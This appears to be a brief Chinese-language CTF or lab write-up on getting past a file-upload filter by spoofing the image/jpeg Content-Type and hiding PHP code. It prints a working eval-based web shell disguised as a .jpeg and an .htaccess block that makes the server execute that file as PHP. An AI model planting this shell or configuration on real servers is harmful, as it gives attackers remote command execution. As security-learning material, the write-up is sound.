目录
归纳法探测1:后缀名不能有ph
那就需要使用图片码,但没有文件包含漏洞,无法执行
所以就采用上传.htaccess配置文件来修改某文件变成php来执行
通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞
归纳法探测2:不能有其他文件类型
然后更改文件名为jpeg后缀,上传
后来发现问题在Content-Type里,只能上传 image/jpeg 类型
但是发现还是能识别到,那就说明有php的特征被识别到了
可能是因为 <?php 被识别到了
归纳法探测3:不能有<?php
就改用JavaScript变成php来执行
<script language="php">@eval($_POST['cmd'])</script>
成功上传了
上传.htaccess文件,修改文件用php运行
<FilesMatch "muma.jpeg">
SetHandler application/x-httpd-php
</FilesMatch>